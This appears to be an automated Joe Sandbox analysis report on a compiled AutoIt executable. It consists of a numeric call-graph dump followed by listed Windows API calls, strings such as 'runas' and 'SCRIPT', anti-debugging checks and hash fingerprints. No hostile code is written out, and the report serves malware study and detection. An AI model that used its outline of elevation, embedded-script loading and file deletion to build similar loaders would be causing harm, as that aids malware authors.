101984->101985 101986 33079e GetLongPathNameW 101985->101986 101987 317bcc 59 API calls 101986->101987 101988 3172bd 101987->101988 101989 31700b 101988->101989 101990 317667 59 API calls 101989->101990 101991 31701d 101990->101991 101992 314750 60 API calls 101991->101992 101993 317028 101992->101993 101994 34e885 101993->101994 101995 
317033 101993->101995 102000 34e89f 101994->102000 102052 317908 61 API calls 101994->102052 101997 313f74 59 API calls 101995->101997 101998 31703f 101997->101998 102046 3134c2 101998->102046 102001 317052 Mailbox 102001->100910 102003 314ddd 136 API calls 102002->102003 102004 31688f 102003->102004 102005 34e031 102004->102005 102006 314ddd 136 API calls 102004->102006 102007 37955b 122 API calls 102005->102007 102008 3168a3 102006->102008 102009 34e046 102007->102009 102008->102005 102010 3168ab 102008->102010 102011 34e067 102009->102011 102012 34e04a 102009->102012 102014 34e052 102010->102014 102015 3168b7 102010->102015 102013 330db6 Mailbox 59 API calls 102011->102013 102016 314e4a 84 API calls 102012->102016 102035 34e0ac Mailbox 102013->102035 102146 3742f8 90 API calls _wprintf 102014->102146 102053 316a8c 102015->102053 102016->102014 102019 34e060 102019->102011 102021 34e260 102022 332d55 _free 58 API calls 102021->102022 102023 34e268 102022->102023 102024 314e4a 84 API calls 102023->102024 102029 34e271 102024->102029 102028 332d55 _free 58 API calls 102028->102029 102029->102028 102031 314e4a 84 API calls 102029->102031 102152 36f7a1 89 API calls 4 library calls 102029->102152 102031->102029 102032 317de1 59 API calls 102032->102035 102035->102021 102035->102029 102035->102032 102147 36f73d 59 API calls 2 library calls 102035->102147 102148 36f65e 61 API calls 2 library calls 102035->102148 102149 37737f 59 API calls Mailbox 102035->102149 102150 31750f 59 API calls 2 library calls 102035->102150 102151 31735d 59 API calls Mailbox 102035->102151 102037 31475d GetFullPathNameW 102036->102037 102037->101977 102037->101978 102039 317734 102038->102039 102040 317d2c 59 API calls 102039->102040 102041 314794 102040->102041 102041->101984 102043 317da6 102042->102043 102044 317d99 102042->102044 102045 330db6 Mailbox 59 API calls 102043->102045 102044->101981 102045->102044 102047 3134d4 102046->102047 102051 3134f3 _memmove 102046->102051 102049 330db6 
Mailbox 59 API calls 102047->102049 102048 330db6 Mailbox 59 API calls 102050 31350a 102048->102050 102049->102051 102050->102001 102051->102048 102052->101994 102054 316ab5 102053->102054 102055 34e41e 102053->102055 102158 3157a6 60 API calls Mailbox 102054->102158 102225 36f7a1 89 API calls 4 library calls 102055->102225 102058 316ad7 102159 3157f6 67 API calls 102058->102159 102059 34e431 102226 36f7a1 89 API calls 4 library calls 102059->102226 102061 316aec 102061->102059 102062 316af4 102061->102062 102064 317667 59 API calls 102062->102064 102066 316b00 102064->102066 102065 34e44d 102068 316b61 102065->102068 102160 330957 60 API calls __write_nolock 102066->102160 102069 34e460 102068->102069 102070 316b6f 102068->102070 102072 315c6f CloseHandle 102069->102072 102073 317667 59 API calls 102070->102073 102071 316b0c 102074 317667 59 API calls 102071->102074 102075 34e46c 102072->102075 102076 316b78 102073->102076 102077 316b18 102074->102077 102078 314ddd 136 API calls 102075->102078 102079 317667 59 API calls 102076->102079 102080 314750 60 API calls 102077->102080 102081 34e488 102078->102081 102082 316b81 102079->102082 102083 316b26 102080->102083 102084 34e4b1 102081->102084 102088 37955b 122 API calls 102081->102088 102163 31459b 102082->102163 102161 315850 ReadFile SetFilePointerEx 102083->102161 102227 36f7a1 89 API calls 4 library calls 102084->102227 102087 316b52 102162 315aee SetFilePointerEx SetFilePointerEx 102087->102162 102092 34e4a4 102088->102092 102089 316b98 102093 317b2e 59 API calls 102089->102093 102095 34e4ac 102092->102095 102096 34e4cd 102092->102096 102097 316ba9 SetCurrentDirectoryW 102093->102097 102094 34e4c8 102102 316d0c Mailbox 102094->102102 102098 314e4a 84 API calls 102095->102098 102099 314e4a 84 API calls 102096->102099 102103 316bbc Mailbox 102097->102103 102098->102084 102100 34e4d2 102099->102100 102101 330db6 Mailbox 59 API calls 102100->102101 102109 34e506 102101->102109 102153 3157d4 102102->102153 102104 
330db6 Mailbox 59 API calls 102103->102104 102107 316bcf 102104->102107 102106 313bbb 102106->100777 102106->100799 102108 31522e 59 API calls 102107->102108 102134 316bda Mailbox __NMSG_WRITE 102108->102134 102228 31750f 59 API calls 2 library calls 102109->102228 102111 316ce7 102221 315c6f 102111->102221 102114 34e740 102234 3772df 59 API calls Mailbox 102114->102234 102115 316cf3 SetCurrentDirectoryW 102115->102102 102118 34e762 102235 38fbce 59 API calls 2 library calls 102118->102235 102121 34e76f 102123 332d55 _free 58 API calls 102121->102123 102122 34e7d9 102238 36f7a1 89 API calls 4 library calls 102122->102238 102123->102102 102126 34e7f2 102126->102111 102129 34e7d1 102237 36f5f7 59 API calls 4 library calls 102129->102237 102130 34e54f Mailbox 102130->102114 102137 317de1 59 API calls 102130->102137 102141 34e792 102130->102141 102229 36f73d 59 API calls 2 library calls 102130->102229 102230 36f65e 61 API calls 2 library calls 102130->102230 102231 37737f 59 API calls Mailbox 102130->102231 102232 31750f 59 API calls 2 library calls 102130->102232 102233 317213 59 API calls Mailbox 102130->102233 102132 317de1 59 API calls 102132->102134 102134->102111 102134->102122 102134->102129 102134->102132 102214 31586d 67 API calls _wcscpy 102134->102214 102215 316f5d GetStringTypeW 102134->102215 102216 316ecc 60 API calls __wcsnicmp 102134->102216 102217 316faa GetStringTypeW __NMSG_WRITE 102134->102217 102218 33363d GetStringTypeW _iswctype 102134->102218 102219 3168dc 165 API calls 3 library calls 102134->102219 102220 317213 59 API calls Mailbox 102134->102220 102137->102130 102236 36f7a1 89 API calls 4 library calls 102141->102236 102143 34e7ab 102144 332d55 _free 58 API calls 102143->102144 102145 34e7be 102144->102145 102145->102102 102146->102019 102147->102035 102148->102035 102149->102035 102150->102035 102151->102035 102152->102029 102154 315c6f CloseHandle 102153->102154 102155 3157dc Mailbox 102154->102155 102156 315c6f CloseHandle 102155->102156 
102157 3157eb 102156->102157 102157->102106 102158->102058 102159->102061 102160->102071 102161->102087 102162->102068 102164 317667 59 API calls 102163->102164 102165 3145b1 102164->102165 102166 317667 59 API calls 102165->102166 102167 3145b9 102166->102167 102168 317667 59 API calls 102167->102168 102169 3145c1 102168->102169 102170 317667 59 API calls 102169->102170 102171 3145c9 102170->102171 102172 34d4d2 102171->102172 102173 3145fd 102171->102173 102174 318047 59 API calls 102172->102174 102175 31784b 59 API calls 102173->102175 102176 34d4db 102174->102176 102177 31460b 102175->102177 102178 317d8c 59 API calls 102176->102178 102179 317d2c 59 API calls 102177->102179 102181 314640 102178->102181 102180 314615 102179->102180 102180->102181 102182 31784b 59 API calls 102180->102182 102183 314680 102181->102183 102185 31465f 102181->102185 102196 34d4fb 102181->102196 102186 314636 102182->102186 102239 31784b 102183->102239 102187 3179f2 59 API calls 102185->102187 102190 317d2c 59 API calls 102186->102190 102191 314669 102187->102191 102188 314691 102192 3146a3 102188->102192 102194 318047 59 API calls 102188->102194 102189 34d5cb 102193 317bcc 59 API calls 102189->102193 102190->102181 102191->102183 102198 31784b 59 API calls 102191->102198 102195 3146b3 102192->102195 102199 318047 59 API calls 102192->102199 102213 34d588 102193->102213 102194->102192 102197 3146ba 102195->102197 102200 318047 59 API calls 102195->102200 102196->102189 102202 34d5b4 102196->102202 102210 34d532 102196->102210 102201 318047 59 API calls 102197->102201 102209 3146c1 Mailbox 102197->102209 102198->102183 102199->102195 102200->102197 102201->102209 102202->102189 102204 34d59f 102202->102204 102203 34d590 102205 317bcc 59 API calls 102203->102205 102206 317bcc 59 API calls 102204->102206 102205->102213 102206->102213 102207 3179f2 59 API calls 102207->102213 102209->102089 102210->102203 102211 34d57b 102210->102211 102212 317bcc 59 API calls 102211->102212 
102212->102213 102213->102183 102213->102207 102252 317924 59 API calls 2 library calls 102213->102252 102214->102134 102215->102134 102216->102134 102217->102134 102218->102134 102219->102134 102220->102134 102222 315c79 102221->102222 102223 315c88 102221->102223 102222->102115 102223->102222 102224 315c8d CloseHandle 102223->102224 102224->102222 102225->102059 102226->102065 102227->102094 102228->102130 102229->102130 102230->102130 102231->102130 102232->102130 102233->102130 102234->102118 102235->102121 102236->102143 102237->102122 102238->102126 102240 3178b7 102239->102240 102241 31785a 102239->102241 102242 317d2c 59 API calls 102240->102242 102241->102240 102243 317865 102241->102243 102249 317888 _memmove 102242->102249 102244 317880 102243->102244 102245 34eb09 102243->102245 102253 317f27 59 API calls Mailbox 102244->102253 102246 318029 59 API calls 102245->102246 102248 34eb13 102246->102248 102250 330db6 Mailbox 59 API calls 102248->102250 102249->102188 102251 34eb33 102250->102251 102252->102213 102253->102249 102255 316d95 102254->102255 102259 316ea9 102254->102259 102256 330db6 Mailbox 59 API calls 102255->102256 102255->102259 102258 316dbc 102256->102258 102257 330db6 Mailbox 59 API calls 102260 316e31 102257->102260 102258->102257 102259->100916 102260->102259 102267 316240 102260->102267 102292 31735d 59 API calls Mailbox 102260->102292 102293 366553 59 API calls Mailbox 102260->102293 102294 31750f 59 API calls 2 library calls 102260->102294 102265->100918 102266->100920 102268 317a16 59 API calls 102267->102268 102286 316265 102268->102286 102269 31646a 102297 31750f 59 API calls 2 library calls 102269->102297 102271 316484 Mailbox 102271->102260 102274 34dff6 102300 36f8aa 91 API calls 4 library calls 102274->102300 102275 31750f 59 API calls 102275->102286 102279 34e004 102301 31750f 59 API calls 2 library calls 102279->102301 102280 317d8c 59 API calls 102280->102286 102282 34e01a 102282->102271 102283 316799 _memmove 102302 36f8aa 

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00313B68
                                                                          • IsDebuggerPresent.KERNEL32 ref: 00313B7A
                                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,003D52F8,003D52E0,?,?), ref: 00313BEB
                                                                            • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
                                                                            • Part of subcall function 0032092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00313C14,003D52F8,?,?,?), ref: 0032096E
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00313C6F
                                                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003C7770,00000010), ref: 0034D281
                                                                          • SetCurrentDirectoryW.KERNEL32(?,003D52F8,?,?,?), ref: 0034D2B9
                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003C4260,003D52F8,?,?,?), ref: 0034D33F
                                                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 0034D346
                                                                            • Part of subcall function 00313A46: GetSysColorBrush.USER32(0000000F), ref: 00313A50
                                                                            • Part of subcall function 00313A46: LoadCursorW.USER32(00000000,00007F00), ref: 00313A5F
                                                                            • Part of subcall function 00313A46: LoadIconW.USER32(00000063), ref: 00313A76
                                                                            • Part of subcall function 00313A46: LoadIconW.USER32(000000A4), ref: 00313A88
                                                                            • Part of subcall function 00313A46: LoadIconW.USER32(000000A2), ref: 00313A9A
                                                                            • Part of subcall function 00313A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00313AC0
                                                                            • Part of subcall function 00313A46: RegisterClassExW.USER32(?), ref: 00313B16
                                                                            • Part of subcall function 003139D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00313A03
                                                                            • Part of subcall function 003139D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00313A24
                                                                            • Part of subcall function 003139D5: ShowWindow.USER32(00000000,?,?), ref: 00313A38
                                                                            • Part of subcall function 003139D5: ShowWindow.USER32(00000000,?,?), ref: 00313A41
                                                                            • Part of subcall function 0031434A: _memset.LIBCMT ref: 00314370
                                                                            • Part of subcall function 0031434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00314415
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                          • String ID: This is a third-party compiled AutoIt script.$runas$%:
                                                                          • API String ID: 529118366-1850546503
                                                                          • Opcode ID: 727961ddc67299ec03197dce51814a824c4d91fbb49f56205354b10361fb5634
                                                                          • Instruction ID: 78b4926d43b6d037bbbca7da95e66aab4580899fbdd311f9c70fc6a82cb5f86c
                                                                          • Opcode Fuzzy Hash: 727961ddc67299ec03197dce51814a824c4d91fbb49f56205354b10361fb5634
                                                                          • Instruction Fuzzy Hash: B0510775948108AECF0BEBB4EC06EFD7B7CAF4C710F044467F451AA2A1DA705689CB61

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetVersionExW.KERNEL32(?), ref: 003149CD
                                                                            • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
                                                                          • GetCurrentProcess.KERNEL32(?,0039FAEC,00000000,00000000,?), ref: 00314A9A
                                                                          • IsWow64Process.KERNEL32(00000000), ref: 00314AA1
                                                                          • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00314AE7
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00314AF2
                                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00314B23
                                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00314B2F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                          • String ID:
                                                                          • API String ID: 1986165174-0
                                                                          • Opcode ID: 98da9d988bab95e5328e26355879355f2d4f6a34cada6382f0f52a82ee6cf413
                                                                          • Instruction ID: 48c1a6afb39b4f25c96eb8996f7f9bf0c974fa81e5b4acb227947f8ca6b9140f
                                                                          • Opcode Fuzzy Hash: 98da9d988bab95e5328e26355879355f2d4f6a34cada6382f0f52a82ee6cf413
                                                                          • Instruction Fuzzy Hash: 7991923198D7C0DEC736DB6894501EABFF9AF2E300B5949AED0C797A41D220F988C759

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00314D8E,?,?,00000000,00000000), ref: 00314E99
                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00314D8E,?,?,00000000,00000000), ref: 00314EB0
                                                                          • LoadResource.KERNEL32(?,00000000,?,?,00314D8E,?,?,00000000,00000000,?,?,?,?,?,?,00314E2F), ref: 0034D937
                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00314D8E,?,?,00000000,00000000,?,?,?,?,?,?,00314E2F), ref: 0034D94C
                                                                          • LockResource.KERNEL32(00314D8E,?,?,00314D8E,?,?,00000000,00000000,?,?,?,?,?,?,00314E2F,00000000), ref: 0034D95F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                          • String ID: SCRIPT
                                                                          • API String ID: 3051347437-3967369404
                                                                          • Opcode ID: 94ca90d7a9315b529ad37e9b18dc7e82858fdea97232d3e3463521e574f3bfe0
                                                                          • Instruction ID: 6adc7ae6004acb8af23d1e0fadefd001e27c40ff628ba35d49dd5f7e293bf66d
                                                                          • Opcode Fuzzy Hash: 94ca90d7a9315b529ad37e9b18dc7e82858fdea97232d3e3463521e574f3bfe0
                                                                          • Instruction Fuzzy Hash: 8A115EB5240700BFD7268B65EC48F677BBEFBC9B11F208669F405C6250DB62E8408A70
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Dd=$Dd=$Dd=$Dd=$Variable must be of type 'Object'.
                                                                          • API String ID: 0-915380733
                                                                          • Opcode ID: 1b9f97da69df06489a3636ed9460352bd5bf2f3337b926ce2cef81ac8b46661d
                                                                          • Instruction ID: e7188432e635bcb101acd9050ed20b0d829a645fa58391fcaba7e6a06e7cc947
                                                                          • Opcode Fuzzy Hash: 1b9f97da69df06489a3636ed9460352bd5bf2f3337b926ce2cef81ac8b46661d
                                                                          • Instruction Fuzzy Hash: B8A26A75A00215CFCB2ACF54C480AEAB7B5FF5D314F258469EC159B351D736AD82CB90
                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?,0034E398), ref: 0037446A
                                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 0037447B
                                                                          • FindClose.KERNEL32(00000000), ref: 0037448B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                          • String ID:
                                                                          • API String ID: 48322524-0
                                                                          • Opcode ID: c0f8dbe748dbeb1167f24e4624f0e433f228f98798ef1f9a7c1c142aaf3a6f50
                                                                          • Instruction ID: bdf41158468185fcf84e58a1052234dd8e5338c15dda0648ec17672fa2a94069
                                                                          • Opcode Fuzzy Hash: c0f8dbe748dbeb1167f24e4624f0e433f228f98798ef1f9a7c1c142aaf3a6f50
                                                                          • Instruction Fuzzy Hash: 99E020374145006F83216B38EC4D5E9775C9F05335F244B17F879C10D0E778AD00A5D5
                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00320A5B
                                                                          • timeGetTime.WINMM ref: 00320D16
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00320E53
                                                                          • Sleep.KERNEL32(0000000A), ref: 00320E61
                                                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 00320EFA
                                                                          • DestroyWindow.USER32 ref: 00320F06
                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00320F20
                                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00354E83
                                                                          • TranslateMessage.USER32(?), ref: 00355C60
                                                                          • DispatchMessageW.USER32(?), ref: 00355C6E
                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00355C82
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb=$pb=$pb=$pb=
                                                                          • API String ID: 4212290369-595688798
                                                                          • Opcode ID: c55a7abd0036fbbb6a348790945340503ecf23535f31d4f68c125103c528123b
                                                                          • Instruction ID: 4405fee1b1981941df432f66fb892f1a9edf14c4dee86f954c598fe213e690f4
                                                                          • Opcode Fuzzy Hash: c55a7abd0036fbbb6a348790945340503ecf23535f31d4f68c125103c528123b
                                                                          • Instruction Fuzzy Hash: 49B2F670608741DFD72BDF24D895FAAB7E4BF84305F15491DE8598B2A1C771E888CB82

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00378F5F: __time64.LIBCMT ref: 00378F69
                                                                            • Part of subcall function 00314EE5: _fseek.LIBCMT ref: 00314EFD
                                                                          • __wsplitpath.LIBCMT ref: 00379234
                                                                            • Part of subcall function 003340FB: __wsplitpath_helper.LIBCMT ref: 0033413B
                                                                          • _wcscpy.LIBCMT ref: 00379247
                                                                          • _wcscat.LIBCMT ref: 0037925A
                                                                          • __wsplitpath.LIBCMT ref: 0037927F
                                                                          • _wcscat.LIBCMT ref: 00379295
                                                                          • _wcscat.LIBCMT ref: 003792A8
                                                                            • Part of subcall function 00378FA5: _memmove.LIBCMT ref: 00378FDE
                                                                            • Part of subcall function 00378FA5: _memmove.LIBCMT ref: 00378FED
                                                                          • _wcscmp.LIBCMT ref: 003791EF
                                                                            • Part of subcall function 00379734: _wcscmp.LIBCMT ref: 00379824
                                                                            • Part of subcall function 00379734: _wcscmp.LIBCMT ref: 00379837
                                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00379452
                                                                          • _wcsncpy.LIBCMT ref: 003794C5
                                                                          • DeleteFileW.KERNEL32(?,?), ref: 003794FB
                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00379511
                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00379522
                                                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00379534
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                          • String ID:
                                                                          • API String ID: 1500180987-0
                                                                          • Opcode ID: e3b3829ed0833fb962f5d0c978e544ddf41d4d00f68bfb84d2c5675aa8fdcb30
                                                                          • Instruction ID: b65c06efe516e5149c0f0efe607f1bbeced9816f0d4559c252d1f61a8db7b083
                                                                          • Opcode Fuzzy Hash: e3b3829ed0833fb962f5d0c978e544ddf41d4d00f68bfb84d2c5675aa8fdcb30
                                                                          • Instruction Fuzzy Hash: 7DC16EB1D0021DAADF26DF95CC85ADEB7BDEF49310F0081A6F609EB141DB349A858F61

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00313074
                                                                          • RegisterClassExW.USER32(00000030), ref: 0031309E
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003130AF
                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 003130CC
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003130DC
                                                                          • LoadIconW.USER32(000000A9), ref: 003130F2
                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00313101
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                          • API String ID: 2914291525-1005189915
                                                                          • Opcode ID: e2af02d6e4e5210bfe176e66658890597adbf2082da6976dea39c40301eacb97
                                                                          • Instruction ID: 8a31e323c01eb0245bab39af7f6836dae45ed303c6fb7d59b9a02895246c01cf
                                                                          • Opcode Fuzzy Hash: e2af02d6e4e5210bfe176e66658890597adbf2082da6976dea39c40301eacb97
                                                                          • Instruction Fuzzy Hash: 90312AB1941309AFDB42CFA4EC45ACDBBF8FB09310F10452BE580E62A0D3B64595CF51

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00313074
                                                                          • RegisterClassExW.USER32(00000030), ref: 0031309E
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003130AF
                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 003130CC
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003130DC
                                                                          • LoadIconW.USER32(000000A9), ref: 003130F2
                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00313101
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
